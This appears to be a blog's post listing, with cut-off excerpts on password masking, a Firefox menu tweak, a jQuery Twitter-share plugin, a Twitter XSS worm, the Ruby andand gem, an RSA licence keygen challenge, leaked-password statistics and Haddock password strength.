Jakob Nielsen today wrote an article calling for all log-in forms to display passwords in plaintext, rather than masking them with bullets or stars. He argues that this increases usability (users feel more confident because they can see their password as they type it), and also increases security (a more confident user will choose stronger [...]
For the longest time, I’ve wanted Firefox to put the “Open Link in New Tab” option at the top of the context menu when I click on a link. I use this option all the time, and the mild annoyance of having to move my mouse to get to it has added up over the [...]
With more and more web sites and businesses embracing Twitter, it’s important to make it as easy as possible users to share content on the social networking site. That’s why I just coded up a jQuery plugin called TweetLink, which allows web developers to easily add “Tweet This Page” buttons to their site.
After the TweetLink [...]
Twitter has had a lot of embarrassing security problems in the past, but the worst part is that they still haven’t learned from their mistakes. Apparently a recent redesign left the profile page vulnerable to a very simple XSS attack.
Some enterprising hacker quickly seized the opportunity to promote Twitter-clone StalkDaily by infecting the profiles of [...]
I came across a really useful Ruby gem today: andand. In PHP web development, I usually use this idiom when retrieving an object from the database model:
$obj = $model->getObject($id);
if(null !== $obj) {
doSomething($obj);
}
Obviously this is a little cumbersome, since I have to do this every single time I get an object [...]
In his latest blog post, Andy Sloane issued a challenge to create a key-generator for his bespoke software licensing scheme.
Looking through his code, I quickly found that he was using RSA, and that valid keys decrypted to 12345678 under a hardcoded RSA public key.
In my response on the Reddit discussion, I explained creating a keygen [...]
Jimmy Ruska has taken the time to combine data from 3 compromised-password lists, and the results are pretty interesting.
If an attacker can try just a single password against every user on your web application, he’ll compromise about 1% of them. Even with a fairly stringent 3-attempt lockout policy, about 2-3% of your users will be [...]
Newly released RubyGem Haddock offers to generate easy-to-remember passwords, but how secure are they?
Haddock-generated passwords are of the form {word}{number}{symbol}{word}, and are generated to be at-most as long as a user-specified length. So for example, an 8-character Haddock password might be “amy7@rax”.
For a relatively low-security password, like you might use for your Twitter account, this is [...]